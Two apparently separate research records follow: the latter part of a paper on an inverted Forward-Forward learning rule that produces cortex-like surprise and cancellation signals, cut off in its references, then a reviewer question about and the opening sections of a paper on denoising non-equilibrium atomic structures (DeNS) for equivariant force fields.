L_{\text{layer}} = (-1)^{\eta} \sigma(x_{\text{layer}}^T(t')x_{\text{layer}}(t') - \theta) \tag{1}
\]

where the parameter \( \theta \in \mathbb{R} \) is the threshold set for the surprise calculation, while \( \eta \) equals zero or one (\( \eta = 0, 1 \)) for negative and positive data samples respectively. The final ingredient is the non-linearity \( \sigma \), which is taken to be a softplus function. It is worth noting that, while global supervisory terms are often dismissed as biologically implausible, \( \eta \) here acts as a simple, singular global signal, rather than something more complicated. Neurotransmitters in biological networks can act over a wide area (via volume transmission) to modulate the activity of many neurons, rather than just those directly connected by synapses. As such, a type of non-local signal might occur in response to learning or other processes, and remain biologically plausible. (We expand on bio-plausibility in Section 4.3.)

Training involves conducting forward passes for positive and negative data simultaneously. The most essential aspect of training is that only forward passes are made at all times. This makes the Forward-Forward algorithm biologically plausible, as it avoids the non-locality of weight information inherent to backpropagation. Only layer-local weights (top-down, bottom-up, lateral) are modified during training. In addition, we demonstrate that this algorithm is theoretically equivalent to particular types of Hebbian learning (see Supplementary Material).
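A minimal PyTorch sketch of this per-layer objective follows. The sign convention here is our own reading, chosen so that minimizing the loss suppresses activity on positive (label-matching) data and amplifies it on negative data, matching the stated objective; all names are illustrative.

```python
import torch
import torch.nn.functional as F

def inverted_ff_layer_loss(x, theta, positive):
    """Per-layer inverted-FF loss, Eq. (1): (+/-) softplus(x^T x - theta).

    x: (batch, units) activity of one layer at one timestep.
    positive: True if the clamped label matches the data input.
    """
    surprise = (x ** 2).sum(dim=-1) - theta  # x^T x - theta, per sample
    sign = 1.0 if positive else -1.0         # our reading of (-1)^eta
    return (sign * F.softplus(surprise)).mean()

# gradient descent on this loss lowers activity for positive data
x = torch.randn(8, 700, requires_grad=True)
inverted_ff_layer_loss(x, theta=700.0, positive=True).backward()
```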
The network learns to process input and label by combining bottom-up and top-down information flows to generate activations that reflect positive and negative data points, respectively, upon training. We revise the training procedure to increase similarity to signal processing in biological networks (Fig. 1c). First, the input is presented to the network (presentation phase), followed by the generation and introduction of the label (processing phase). Each phase comprises a number of timesteps (10 and 15, respectively). Training does not occur during the presentation phase; rather, training occurs only when label information is received during the processing phase. Each layer’s surprise decreases (increases) based on whether the associated label matches (mismatches) the presented input. This resembles cortical processing, where surprise signals, often resulting in increased activity, are thought to arise from a mismatch between our sensory inputs and top-down signals reflecting our internal beliefs or world model (here, the label information). In other words, when the input and label match each other, the activity is lower than when a mismatch, or surprise, occurs. Inference involves running both the presentation phase and the processing phase, but keeping all parameters fixed. The class can then be decoded from the latents of the processing phase.

### 3 RESULTS

We train the model on the MNIST dataset following the scheme highlighted in Fig. (1). For every iteration, a single MNIST image is selected and presented as an input to the network (presentation phase of 10 timesteps). Following this presentation phase, the label is introduced, while still presenting the image, and the network processes both input and label information (processing phase of 15 timesteps). We first focus on the spatial integration of bottom-up and top-down information flows. Learning follows as per Eq. (1), and accuracy is computed as outlined in Hinton (2022): for each input image $x$, all possible labels (classes 0 to 9) are introduced to the network, and we deem the input image to be accurately processed if the surprise for the correct label is lower than for any other label.

We train a 5-layer network with 700 neurons per layer minimizing Eq. (1). We used RMSProp as the optimizer with learning rate $5 \cdot 10^{-5}$, batch size 500, and Leaky ReLU as the transfer function for all units. We used no momentum and applied a stopgrad operation to all adjacent layer activations to prevent the parameter gradients from growing beyond one step. Weight initializations and further details can be found in the available repository.\footnote{github [REDACTED FOR REVIEW]} The 5-layer, 25-timestep model achieved 95% test accuracy upon training (Fig. (2a)). Different activation functions were attempted, and sigmoid consistently performed worse than ReLU derivatives (Fig. (2a)).

### 3.1 Hierarchical emergence of surprise and cancellation signals

By analyzing layer activity via the L2 norm over time, we confirmed that the model learned to dynamically suppress neural activity across both layers and time whenever the input image matched the respective label (Fig. (2b)). The difference between negative and positive activations showed a clear divergence upon label presentation (Fig. (2b)). This trend was the result of the contribution of multiple input components to the layers (Fig. (2c)).
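The per-timestep update and the one-step gradient restriction described above can be made concrete with a short sketch. The module layout (separate lateral, bottom-up, and top-down linear maps) follows the description in Section 2, while the exact placement of the stopgrad (here on all previous-step activities) is our simplification; names are illustrative.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class FFLayer(nn.Module):
    """One layer with lateral (W), bottom-up (Fwd), top-down (B) weights."""
    def __init__(self, units, below_dim, above_dim):
        super().__init__()
        self.W = nn.Linear(units, units)
        self.Fwd = nn.Linear(below_dim, units)
        self.B = nn.Linear(above_dim, units)

def step(layers, x, image, label):
    """One synchronous timestep; detach() is the stopgrad keeping
    parameter gradients within a single step."""
    below = [image] + x[:-1]   # data input clamped at the bottom
    above = x[1:] + [label]    # label input clamped at the top
    return [
        F.leaky_relu(L.W(h.detach()) + L.Fwd(b.detach()) + L.B(a.detach()))
        for L, h, b, a in zip(layers, x, below, above)
    ]
```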
Notably, the forward component, representing the input from lower layers, was the only component significantly stronger for negative versus positive data, suggesting a leading role of this component in driving the increased activity for surprise signals. This was true across all layers (Fig. S2). In order to understand how these input components were driving the increase in activity for negative data (surprise signal) and the decrease in activity for positive data (the cancellation upon label presentation), we focused on the late timesteps (10-25) where these phenomena appeared. We verified whether different input components were aligned or misaligned with each other, thereby producing a cancellation in the overall activity. To this end we computed the cosine similarity (scalar product) between all pairs of the three input components before and after label presentation (presentation vs. processing phase, Fig. (2d)). For positive data the forward component was largely anti-aligned to both the backward and lateral components, suggesting that the decrease in activity was due to the bottom-up (forward) information flow canceling the top-down (backward) and recurrent (lateral) information flows (Fig. 2(d)). Conversely, for negative data, the top-down and bottom-up information flows showed a higher degree of alignment, resulting in increased activations (surprise signal) (Fig. 2(d)).

Figure 3: Activation surprise and cancellation order. (a) The negative minus positive activations (differences) over time (x-axis), shown as a measure of the negative-activation surprise signal, offset from the baseline of the positive activations. (b) The L2 norm of negative activations (y-axis) across time (x-axis), visualizing the cascade of negative activations during the processing phase. (c) Same as panel b for the cancellation of positive activations.

This analysis shows that our model reproduces hierarchical properties of predictive computations by generating information flows that result in surprise and cancellation signals. These signals are associated with the processing of negative and positive data, respectively, and involve distinct network information flows based on the dynamic cancellation of multiple input components. Although the degree of alignment across components could vary from instantiation to instantiation, these cancellation phenomena were highly robust.

3.2 Dynamical emergence of surprise and cancellation signals

We next interrogated the temporal characteristics of the cancellation and surprise information flows. We began by plotting activation differences across all layers (as in Fig. 2(c)) in Fig. 3(a). This demonstrated that the encoding of positive versus negative data diverged more rapidly in early layers compared to later layers. To confirm this, we analyzed activations for negative and positive data during the processing phase, after introducing the label. For negative data, activity grew faster in earlier layers despite label information being fed from the top of the hierarchy (Fig. 3(b)). In the case of positive data, early-layer activations led the cancellation cascade by returning to a lower activation state prior to late layers, establishing a bottom-up cancellation ordering. We also analyzed the cosine similarity between activations of consecutive layers for both positive and negative data (Fig. S3), confirming these cascade orderings for surprise and cancellation signals respectively. Together, these findings shown in Figs.
3(a) to 3(c) indicate that alignment and anti-alignment dynamics across layer activations, leading to surprise and cancellation signals, originate in early layers despite the introduction of the label at the top of the hierarchy.

3.3 Interpreting latent representations which drive cancellations

To understand the latent-space mechanics driving cancellations on positive data, we examined the dynamics governing the latent space. We first plotted the average class-wise activations for various PCs in lower dimensions (Fig. 4(a)). We observe that the lower-order PCs do not offer a strong representation of the class, but they do offer a consistent path through the space that starts and ends at the same point. This is in line with the mechanics of the network under positive data, which starts from an initially low activity and recovers to a similarly low activity following all the timesteps where the label is presented. In the higher-order PCs (4-6), chosen for their stronger representations, the same looping mechanics are shown; however, now the classes are represented in a separable manner. To further quantify this qualitative analysis, we performed a careful decoding analysis highlighting the presence of label information across multiple PCs (Fig. S4c). For negative data, the looping behavior in the latent space does not occur, and the latent states drift away from the origin erratically in a class- and label-dependent manner.

To measure the directionality of information flow throughout, 5 MLPs were trained on the latents of each of the 5 layer-wise activations for positive data (Fig. 4(b)). High decodability indicates label-specific information. Two distinct cascades of decodability increase were observed: one for the presentation phase (timesteps 0-9, upon image presentation), and another for the processing phase (timesteps 10-24, upon label introduction). These decodability increases revealed a layer-wise temporal ordering in opposite directions, consistent with the introduction of the image and label at the bottom and top of the layer hierarchy, respectively. In the presentation phase, the decodability increases first for lower layers, indicating a bottom-up temporal ordering. By contrast, in the processing phase, the decodability increases first for upper layers. This analysis examines population-level coding and demonstrates the encoding properties of the network throughout its hierarchy, tracking label-specific information.

Figure 4: Latent representations and label decodability over both principal components and layers. (a) Representation of the layer-wise latent spaces in three dimensions via PCA, where classes are represented by color. The first three PCs are shown to indicate a lack of class separability; higher-order PCs are shown to indicate stronger class separability. (b) Decodability (y-axis) over time (x-axis) for different layers, indicating that the pre-label timesteps are driven by a distinct bottom-up temporal ordering, and that, by contrast, late processing time displays cancellation (and the associated drop in decodability) cascading from the bottom up.

3.4 Comparison of the Forward-Forward Architecture with Predictive Coding Networks

The hierarchical predictive dynamics analyzed thus far, giving rise to surprise and cancellation signals, are specific to our model.
We compare our model with established predictive coding networks (PCNs), first introduced by Rao & Ballard (1999), to further characterize these dynamics in contrast to those of PCNs. Predictive coding networks are characterized by a hierarchical structure wherein each layer predicts the subsequent layer’s activity, informed by the product of its activity and a weight matrix, processed through a nonlinear function. The objective function of this predictive coding network is to minimize the loss

$$L_l = \|\phi(B\vec{x}_{l+1}) - \vec{x}_l\|^2,$$

which is often referred to as the prediction error. Here, $\vec{x}_l$ denotes the activity of layer $l$, $B$ represents the weight matrix, and $\phi$ is a nonlinear activation function. The training process involves an alternating optimization strategy where the network first adjusts its weights to minimize the prediction error and subsequently refines the layer activations to further reduce the discrepancy between prediction and actual sensory input. This iterative process aims to model the brain’s learning mechanism, which continually adapts to new information.

The Forward-Forward architecture differs from this framework in its intrinsic generation of predictions. Rather than relying on a hand-coded error computation between layers with dedicated error neurons and prediction errors, the Forward-Forward network learns predictions through a local learning rule intrinsic to each layer. This critical difference generates a dynamic which is qualitatively different. Figs. (5a) to (5c) show respectively the activations of error neurons, non-error neurons, and the compound activity. None of the highlighted phenomena in the Forward-Forward dynamics is present in such a predictive coding model. Critically, in a PCN, there is no distinction between positive and negative data, no surprise or cancellation signals generated by the network, and no bottom-up (or top-down) cascade in the way information propagates through the network. On the other hand, these elements are observed in cortical networks, and are naturally generated by the Forward-Forward model.

Figure 5: Analysis of the Predictive Coding Network. (a) The norm of activation of error neurons decreases with time for all layers. (b) The norm of activation of non-error neurons increases across timesteps, with no relationship between amplitude and layer position. (c) The norm of the compound activations of error and non-error neurons.

The Forward-Forward’s approach of eschewing hand-coded prediction errors leads to more biologically aligned phenomena, as it appears to reproduce the spatio-temporal bottom-up activity cascade observed in mouse full-field flash experiments, as highlighted by Siegle et al. (2021). This cascade did not appear in our implementation of a PCN, which instead demonstrated a rise in prediction errors across all layers simultaneously. Further research is needed towards understanding the conditions under which predictive coding networks (PCNs) might align with the Forward-Forward architecture’s distinctive dynamics, challenging the boundaries of these computational models in cortical computation emulation.

3.5 THE INVERTED FORWARD-FORWARD IS A CONTRASTIVE THREE-FACTOR LEARNING RULE WHICH CONVERGES TO SYNAPTIC DRIVE CANCELLATION

In this section, we demonstrate an online learning variant, showing learned cancellation arising from minimizing/maximizing cumulative surprise.
For an $N > 3$ Forward-Forward architecture, where $N$ is the total number of layers, $I$ is the data input, and $\ell$ is the label input, the dynamics of each layer are governed by

$$\dot{x}_i = \phi(W_i x_i + F_i x_{i-1} + B_i x_{i+1}),$$

where $x_0 = I(t')$ at the bottom of the hierarchy and $x_{N+1} = \ell(t')$ at the top. The locally defined loss for a one-step update takes the form of

$$L_{layer}(t') = (-1)^{\eta} \sigma(x_i^T x_i - \theta)$$

where $\sigma(x)$ represents the softplus, $\sigma(x) = \log(1 + e^x)$, a smooth version of the ReLU nonlinearity. Importantly, $\eta(t')$ is governed by bistable dynamics:

$$\eta(t') = \delta_{L(t'),I(t')}$$

which switches only on long timescales. Here $\delta_{ij}$ is the Kronecker delta notation, and $L(t')$ is a signal that defines positive and negative data. This phenomenon could align with neuromodulator-induced shifts in underlying dynamics. It also suggests a criterion for selecting $\eta(t')$ based on the instantaneous surprise of the stimulus against the speculative label. Although beyond the scope of this work, the closure of this loop between activations and cost function may generate valuable insights into unsupervised variants of these learning rules (Ororbia & Mali, 2023). We then execute a single-step gradient update in each parameter:

$$\partial_t W_i = -\alpha \nabla_{W_i} L(t')$$
$$\partial_t B_i = -\alpha \nabla_{B_i} L(t')$$
$$\partial_t F_i = -\alpha \nabla_{F_i} L(t').$$

By iteratively minimizing this locally defined objective function, we seek a hierarchical structure that will work in concert with the other layers to minimize activations for positive data. However, when there is a data mismatch between label and image class, the representations will learn to avoid cancellation so as to increase their surprise. Indeed, this single-step update for a given layer takes the form of three-factor Hebbian learning, since

$$\nabla_{W_i} \mathcal{L}_i(t') = (-1)^{\eta} \sigma'(\vec{x}_i^T(t') \vec{x}_i(t') - \theta)\, \vec{x}_i(t')\, \phi'(\vec{z}(t' - 1))\, \vec{x}_i^T(t' - 1),$$

where $\vec{z}(t' - 1) = W_i \vec{x}_i(t' - 1) + F_i \vec{x}_{i-1}(t' - 1) + B_i \vec{x}_{i+1}(t' - 1)$ is the input current into the nonlinearity. This form of learning is formally a gated Hebbian or three-factor rule (Bahroun et al.; Kuśmierz et al., 2017; Bredenberg et al., 2021; Pogodin & Latham, 2020; Portes et al., 2022; Bellec et al., 2020; Murray, 2019), linking the locally defined objective function to the product of the pre-synaptic current and the post-synaptic activation. Crucially, the update accumulated over a single trial is the cumulative sum over the full sequence:

$$\Delta W_i = -\alpha \sum_{t'} \nabla_{W_i} \mathcal{L}_i(t').$$

These gradients have important implications for the shape of the learned solutions. These learned solutions (where the gradient goes toward zero) can occur under a number of conditions. These conditions include the direct cancellation of the synaptic drive currents (input components) governing the time dynamics of the hidden layer: $W_i \vec{x}_i + F_i \vec{x}_{i-1} + B_i \vec{x}_{i+1} = 0$.

In this section, we established an equivalence between the inverted Forward-Forward and a unique form of gated Hebbian plasticity (dominated by a slow-timescale sign-flip, a threshold-passing gate, and a self-gain) (see Section 4.1). In addition, we have demonstrated that the cancellation mechanism of lateral, top-down, and bottom-up signals satisfies the stationary solution of this deduced three-factor learning rule.

4 DISCUSSION

4.1 Why is the PCN distinct from the inverted FF?
On the surface, the PCN and inverted FF are motivated by the same ambitions. They both avoid backpropagation in favor of local cost functions that admit three-factor descriptions of their learning. By using this unifying approach to focus on the third factor alone, we can appreciate the differences more clearly.

$$\text{Third Factor} = \begin{cases} (-1)^{\eta} \sigma'(\vec{x}_i^T(t') \vec{x}_i(t') - \theta)\,(\vec{x}_i(t')) & \text{for the inverted FF} \\ (\phi(B_i \vec{x}_{i+1}) - \vec{x}_i) & \text{for the PCN} \end{cases}$$

The inverted FF differs from the PCN in two key aspects: contrastive supervision and gating conditions. In the inverted FF, supervision involves clamping the label at the top and employing a contrastive signal. In contrast, even in the PCN with a clamped label, the contrastive signal is absent. The second distinction lies in the conditioning of weight updates: on layer activity in the inverted FF, and on prediction error in the PCN. These differences account for the variations in steady-state activity and ordering.

4.2 Mechanisms behind cancellation order

Our simulations reveal a compelling, non-trivial logic underlying the model's hierarchical predictive dynamics, which are often difficult to comprehend. Here, we seek to explain the fundamental mechanistic principles underlying the network's generation of information flows. Although such insights are difficult to isolate or prove, they may still be necessary for comprehending the model's inner mechanisms.

For the initial presentation phase of both positive and negative data, the image representation flows from the bottom up. The dynamics, however, differ markedly in the processing phase. For negative data, the processing phase induces a top-down signal carrying label information downward through all layers. This top-down label signal causes relatively small increases in layer activation magnitude. It is only when the label information reaches the bottom that the activation response grows dramatically, indicating a mismatch and evoking a large and sustained excitatory surprise. For positive data, the label representation traverses to the bottom layer without inducing cancellations; the cancellations then start in a bottom-up manner, despite the top-down label representation.

As the presentation phase blends with the processing phase, it is insightful to note that neither for the positive nor the negative case does some predisposed behavior take place. The layers in the network do not amplify or reduce their activations until the label representation reaches at least one layer below them and sends a label-infused representation back upwards. This suggests the bottom-up cancellation could be a result of the network's optimizing drive to alter activities when in a familiar state relative to training. During training, there is continuous and consistent exposure to label-augmented activations, particularly past the early stages, which ingrains a behavior within the network. The network recognizes label-saturated activations as the dominant trend it should ideally be prepared for. Given this recognition, the network is best equipped for cancellation when it encounters activation components (forward, backward, recurrent) with label information coming from all components, not just from the top.
Under this concept, a layer lower in the hierarchy would be predisposed to cancel first, due to the smaller number of layers below it that lack label-infused information and would thereby block cancellation. Thus, cancellation in lower layers would be followed by a transmission of label-infused activities upwards to the next layer, inducing subsequent phases of bottom-up cancellation.

4.3 Bio-plausibility of the Inverted Forward-Forward

The inverted Forward-Forward model uses activation contrast to navigate credit assignment in hierarchical architectures in a bio-plausible fashion by incorporating: the absence of weight transport (Lillicrap et al., 2016; Portes et al., 2022), online-compatible learning rules consistent with three-factor Hebbian plasticity, a biologically analogous separation of timescales, and the incorporation of structural hierarchy. First, feedback is separated from backpropagation and instead incorporated as a top-down signal, avoiding weight transport. By disconnecting the $F$ and $B$ matrices, the flexible learning rule finds aligned but non-weight-transported solutions.

Although global supervisory terms are sometimes downplayed as biologically implausible, it is worth noting that $\eta$ functions as a simple, singular global signal. In biological networks, neurotransmitters can exert influence over a broad area via volume transmission, modulating the activity of many neurons beyond those directly connected by synapses. This non-local signaling introduces biological plausibility, especially in the context of the local update rules of the inverted Forward-Forward model, which involve local Hebbian plasticity gated by thresholded activation and signed by data type. The associated third factor ties an external signal, suggestive of the aforementioned neuromodulatory input, to the minimization (maximization) of layer activity for positive (negative) labels. The slow timescales of this switching, relative to both dynamics and plasticity, suggest a normative hypothesis for the role of perhaps overlooked small molecules (Kuśmierz et al., 2017). Thus, the inverted Forward-Forward model introduces biological plausibility to the direct competition of top-down and bottom-up signal processing, with intriguing implications for interpreting the hierarchy of biological systems (Siegle et al., 2021; Garrett et al., 2023).

5 Conclusion

In this work, we have presented a biologically plausible mechanism that sheds light on the spatiotemporal and predictive nature of cortical processing without necessitating explicit predictions. Drawing inspiration from the Forward-Forward model, an emerging form of local, contrastive learning, we inverted its original objective function to reduce surprise activations for positive data. This inversion incentivizes activity cancellation between information flows when top-down labels align with bottom-up sensory input. As a consequence, layers across the hierarchy develop the ability to predict and cancel each other's activities, facilitating the minimization of layer surprise.

In conclusion, our study demonstrates that a local contrastive learning approach based upon surprise can recreate predictive spatiotemporal properties. The emergence of these neocortical-like processes advocates for understanding cortical computation through simple learning principles. This discovery offers a ready avenue to improve the computational capacities of biologically plausible models.
REFERENCES

David Badre and Derek Evan Nee. Frontal cortex and the hierarchical control of behavior. *Trends in Cognitive Sciences*, 22(2):170–188, 2018. URL https://www.cell.com/trends/cognitive-sciences/fulltext/S1364-6613%2817%2930245-0. Publisher: Elsevier.

Yanis Bahroun, Dmitri B Chklovskii, and Anirvan M Sengupta. A Normative and Biologically Plausible Algorithm for Independent Component Analysis.

Danielle S. Bassett and Olaf Sporns. Network neuroscience. *Nature Neuroscience*, 20(3):353–364, 2017. URL https://www.nature.com/articles/nn.4502. Publisher: Nature Publishing Group US New York.

Guillaume Bellec, Franz Scherr, Anand Subramoney, Elias Hajek, Darjan Salaj, Robert Legenstein, and Wolfgang Maass. A solution to the learning dilemma for recurrent networks of spiking neurons. *Nature Communications*, 11(1):3625, July 2020. ISSN 2041-1723. doi: 10.1038/s41467-020-17236-y. URL https://www.nature.com/articles/s41467-020-17236-y. Publisher: Nature Publishing Group.

Colin Bredenberg, Benjamin S. H. Lyo, Eero P. Simoncelli, and Cristina Savin. Impression learning: Online representation learning with synaptic plasticity. November 2021. URL https://openreview.net/forum?id=MAorPaLqam.

Rishidev Chaudhuri, Kenneth Knoblauch, Marie-Alice Gariel, Henry Kennedy, and Xiao-Jing Wang. A large-scale circuit mechanism for hierarchical dynamical processing in the primate cortex. *Neuron*, 88(2):419–431, 2015. URL https://www.cell.com/neuron/pdf/S0896-6273(15)00765-5.pdf. Publisher: Elsevier.

Emmanouil Froudarakis, Paul G. Fahey, Jacob Reimer, Stelios M. Smirnakis, Edward J. Tehovnik, and Andreas S. Tolias. The Visual Cortex in Context. *Annual Review of Vision Science*, 5(1):317–339, September 2019. ISSN 2374-4642, 2374-4650. doi: 10.1146/annurev-vision-091517-034407. URL https://www.annualreviews.org/doi/10.1146/annurev-vision-091517-034407.

Marina Garrett, Peter Groblewski, Alex Piet, Doug Ollershaw, Farzaneh Najafi, Iryna Yavorska, Adam Amster, Corbett Bennett, Michael Buice, Shiella Caldejon, Linzy Casal, Florence D’Orazi, Scott Daniel, Saskia EJ de Vries, Daniel Kapner, Justin Kiggins, Jerome Lecoq, Peter Ledochowitsch, Sahar Manavi, Nicholas Mei, Christopher B. Morrison, Sarah Naylor, Natalia Orlova, Jed Perkins, Nick Ponvert, Clark Roll, Sam Seid, Derrick Williams, Allison Williford, Ruweida Ahmed, Daniel Amine, Yazan Billeh, Chris Bowman, Nicholas Cain, Andrew Cho, Tim Dawe, Max Departee, Marie Desoto, David Feng, Sam Gale, Emily Gelfand, Nile Gradis, Conor Grasso, Nicole Hancock, Brian Hu, Ross Hytnen, Xiaoxuan Jia, Tye Johnson, India Kato, Sara Kivikas, Leonard Kuan, Quinn L’Heureux, Sophie Lambert, Arielle Leon, Elizabeth Liang, Fuhui Long, Kyla Mace, Ildefons Magrans de Abril, Chris Mochizuki, Chelsea Nayan, Katherine North, Lydia Ng, Gabriel Koch Ocker, Michael Oliver, Paul Rhoads, Kara Ronellenfitch, Kathryn Schelonka, Josh Sevigny, David Sullivan, Ben Sutton, Jackie Swapp, Thuyanh K. Nguyen, Xana Waughman, Joshua Wilkes, Michael Wang, Colin Farrell, Wayne Wakeman, Hongkui Zeng, John Phillips, Stefan Mihalas, Anton Arkhipov, Christof Koch, and Shawn R. Olsen.
Stimulus novelty uncovers coding diversity in visual cortical circuits, February 2023. URL
X7gqOBG8ow
In Table 5, the authors demonstrate that the DeNS training is more efficient and results in larger performance gains than increasing max degrees of irreps. I wonder why the authors changed the model from EquiformerV2 to EquiformerV1 for this investigation. After all, the EquiformerV2 model is claimed to largely benefit from scaling the max degrees of irreps. How would EquiformerV2 with different max degrees of irreps behave in the same setting of Table 5?
GENERALIZING DENOISING TO NON-EQUILIBRIUM STRUCTURES IMPROVES EQUIVARIANT FORCE FIELDS

Anonymous authors
Paper under double-blind review

ABSTRACT

Understanding the interactions of atoms, such as forces, in 3D atomistic systems is fundamental to many applications like molecular dynamics and catalyst design. However, simulating these interactions requires compute-intensive *ab initio* calculations and thus results in limited data for training neural networks. In this paper, we propose to use denoising non-equilibrium structures (DeNS) as an auxiliary task to better leverage training data and improve performance. For training DeNS, we first corrupt a 3D structure by adding noise to its 3D coordinates and then predict the noise. Different from previous works on pre-training via denoising, which are limited to equilibrium structures, the proposed DeNS generalizes to a much larger set of non-equilibrium structures without relying on another dataset for pre-training. The key enabler is the encoding of input forces. A non-equilibrium structure has non-zero forces and thus many possible atomic positions, making denoising an ill-posed problem. To address the issue, we additionally take the forces of the original structure as inputs to specify which non-equilibrium structure we are denoising. Concretely, given a corrupted non-equilibrium structure and the forces of the original one, we predict the non-equilibrium structure satisfying the input forces instead of any arbitrary structures. Since DeNS requires encoding forces, DeNS favors equivariant networks, which can easily incorporate forces and other higher-order tensors in node embeddings. We demonstrate the effectiveness of training equivariant networks with DeNS on the OC20, OC22 and MD17 datasets. For OC20, EquiformerV2 (Liao et al., 2023) trained with DeNS achieves better Structure to Energy and Forces (S2EF) results and comparable Initial Structure to Relaxed Energy (IS2RE) results. For OC22, EquiformerV2 trained with DeNS establishes new state-of-the-art results. For MD17, Equiformer ($L_{max} = 2$) (Liao & Smidt, 2023) trained with DeNS achieves better results and saves $3.1 \times$ training time compared to Equiformer ($L_{max} = 3$) without DeNS, where $L_{max}$ denotes the maximum degree. We also show that DeNS can improve other equivariant networks like eSCN (Passaro & Zitnick, 2023) on OC20 and SEGNN-like networks (Brandstetter et al., 2022) on MD17.

1 INTRODUCTION

Graph neural networks (GNNs) have made remarkable progress in approximating high-fidelity, compute-intensive quantum mechanical calculations like density functional theory (DFT) for atomistic systems (Gilmer et al., 2017; Zhang et al., 2018; Unke et al., 2021; Batzner et al., 2022; Rackers et al., 2023; Lan et al., 2022), enabling new insights in applications such as molecular dynamics simulations (Musaelian et al., 2023) and catalyst design (Chanussot* et al., 2021; Lan et al., 2022). However, unlike other domains such as natural language processing (NLP) and computer vision (CV), the scale of atomistic data is quite limited since generating data requires compute-intensive *ab initio* calculations. For example, the largest atomistic dataset, OC20 (Chanussot* et al., 2021), contains about 1.38M examples, while GPT-3 (Brown et al., 2020) is trained on hundreds of billions of words and ViT-22B (Dehghani et al., 2023) is trained on around 4B images.
To start addressing this gap, we take inspiration from self-supervised learning methods in NLP and CV and explore how we can adapt them to learn better atomistic representations from existing labeled data. Specifically, one of the most popular self-supervised learning methods in NLP (Devlin et al., 2019) and CV (He et al., 2022) is training a denoising autoencoder (Vincent et al., 2008), where the idea is to mask or corrupt a part of the input data and learn to reconstruct the original, uncorrupted data. Denoising assumes we know a unique target structure to denoise to, e.g., a sentence and an image in the case of NLP and CV. Indeed, this is the case for equilibrium structures (e.g., $S_{eq}$ at a local energy minimum in Figure 1b), as has been demonstrated by previous works leveraging denoising for pre-training on atomistic data (Jiao et al., 2022; Zaidi et al., 2023; Liu et al., 2023; Wang et al., 2023; Feng et al., 2023a).

Figure 1: Illustration of denoising equilibrium and non-equilibrium structures. In this figure, we relax a non-equilibrium structure (red point) and form a local relaxation trajectory (black dotted arrow). All the points along the trajectory except the blue point are non-equilibrium structures.

However, most previous works are limited to equilibrium structures, and equilibrium structures constitute a small portion of available data since structures along a trajectory to get to a local minimum are all non-equilibrium. Hence, there is a need to generalize denoising to leverage the larger set of non-equilibrium structures.

Since a non-equilibrium structure has atom-wise forces and atoms are not confined to energy local minima, it has more possible atomic positions than an equilibrium one. As shown in Figure 1a, this can make denoising an ill-posed problem since there are many possible target structures to denoise to. To address the issue, we propose to take the forces of the original non-equilibrium structure as inputs when denoising non-equilibrium structures. Intuitively, the forces constrain the atomic positions of a non-equilibrium structure. With this additional information, we are able to predict the original non-equilibrium structure satisfying the input forces instead of predicting arbitrary structures, as shown in Figure 1c. Previous works on denoising equilibrium structures (Jiao et al., 2022; Zaidi et al., 2023; Liu et al., 2023; Feng et al., 2023b,a) end up being a special case where the forces of the original structures are close to zero.

Based on this insight, in this paper, we propose to use denoising non-equilibrium structures (DeNS) as an auxiliary task to better leverage atomistic data. For training DeNS, we first corrupt a structure by adding noise to its 3D atomic coordinates and then reconstruct the original uncorrupted structure by predicting the noise. For noise predictions, a model is given the forces of the original uncorrupted structure as inputs to make the transformation from a corrupted non-equilibrium structure to an uncorrupted non-equilibrium structure tractable. When used along with original tasks like predicting energy and forces of non-equilibrium structures, DeNS improves the performance of the original tasks with a marginal increase in training cost. We further discuss how DeNS can leverage more from training data and the connection to self-supervised learning methods in other domains. Because DeNS requires encoding forces, it favors equivariant networks.
They build up equivariant features at each node with vector spaces of irreducible representations (irreps) and have interactions or message passing between nodes with equivariant operations like tensor products. Since forces can be projected to vector spaces of irreps with spherical harmonics, equivariant networks can easily incorporate forces in node embeddings. Moreover, with the reduced complexity of equivariant operations (Passaro & Zitnick, 2023) and the incorporation of Transformer network design (Liao & Smidt, 2023; Liao et al., 2023) from NLP (Vaswani et al., 2017) and CV (Dosovitskiy et al., 2021), equivariant networks have become the state-of-the-art methods on large-scale atomistic datasets.

We conduct extensive experiments on the OC20 (Chanussot* et al., 2021), OC22 (Tran* et al., 2022) and MD17 (Chmiela et al., 2017; Schütt et al., 2017; Chmiela et al., 2018) datasets and focus on how DeNS can improve the performance of equivariant networks. EquiformerV2 trained with DeNS achieves better S2EF results and comparable IS2RE results on OC20. EquiformerV2 trained with DeNS sets new state-of-the-art results on OC22. EquiformerV1 ($L_{max} = 2$) (Liao & Smidt, 2023) trained with DeNS achieves better results on MD17 than EquiformerV1 ($L_{max} = 3$) without DeNS and saves $3.1 \times$ training time. DeNS can also improve other equivariant networks like eSCN (Passaro & Zitnick, 2023) on OC20 and SEGNN-like networks (Brandstetter et al., 2022) on MD17.

2 RELATED WORKS

**Denoising 3D Atomistic Structures.** Denoising structures have been used to boost the performance of GNNs on 3D atomistic datasets (Godwin et al., 2022; Jiao et al., 2022; Zaidi et al., 2023; Liu et al., 2023). The approach is to first corrupt data by adding noise and then train a denoising autoencoder to reconstruct the original data by predicting the noise, and the motivation is that learning to reconstruct data enables learning generalizable representations (Devlin et al., 2019; He et al., 2022; Godwin et al., 2022; Zaidi et al., 2023). Since denoising equilibrium structures does not require labels and is self-supervised, similar to BERT (Devlin et al., 2019) and MAE (He et al., 2022), it is common to pre-train via denoising on a large dataset of equilibrium structures like PCQM4Mv2 (Nakata & Shimazaki, 2017) and then fine-tune with supervised learning on smaller downstream datasets. Besides, Noisy Nodes (Godwin et al., 2022) uses denoising equilibrium structures as an auxiliary task alongside original tasks without pre-training on another larger dataset. However, most previous works are limited to equilibrium structures, which make up a much smaller amount of data than non-equilibrium ones. In contrast, the proposed DeNS generalizes denoising to non-equilibrium structures with force encoding so that we can improve performance on the larger set of non-equilibrium structures. We provide a detailed comparison to previous works on denoising in Section A.2.

**SE(3)/E(3)-Equivariant Networks.** Refer to Section A.1 for discussion on equivariant networks.

### 3 Method

#### 3.1 Problem Setup

Calculating quantum mechanical properties like energy and forces of 3D atomistic systems is fundamental to many applications. An atomistic system can be one or more molecules, a crystalline material, and so on. Specifically, each system $S$ is an example in a dataset and can be described as $S = \{(z_i, p_i) | i \in \{1, ..., |S|\}\}$, where $z_i \in \mathbb{N}$ denotes the atomic number of the $i$-th atom and $p_i \in \mathbb{R}^3$ denotes the 3D atomic position.
